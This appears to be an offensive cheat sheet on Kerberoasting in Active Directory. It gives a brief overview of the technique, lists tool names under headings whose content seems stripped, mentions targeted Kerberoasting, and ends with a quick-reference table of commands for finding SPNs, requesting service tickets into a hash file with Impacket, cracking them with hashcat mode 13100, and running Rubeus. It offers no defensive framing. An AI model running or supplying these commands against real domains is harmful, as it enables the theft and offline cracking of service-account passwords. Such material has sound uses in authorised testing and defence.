Overview
Any domain user can request TGS ticket for any service with SPN. Ticket encrypted with service account password hash → crack offline.Find SPNs
PowerView
ldapsearch
Impacket
Request Tickets
Impacket (Linux)
Rubeus (Windows)
PowerView
setspn (Built-in)
Crack
Hashcat
John
Targeted Kerberoasting
Set SPN on user you want to attack (needs GenericAll/GenericWrite).Quick Reference
| Task | Command |
|---|---|
| Find SPNs | impacket-GetUserSPNs DOMAIN/user:pass -dc-ip DC |
| Request | Add -request -outputfile hashes.txt |
| Crack | hashcat -m 13100 hashes.txt wordlist |
| Rubeus | .\Rubeus.exe kerberoast |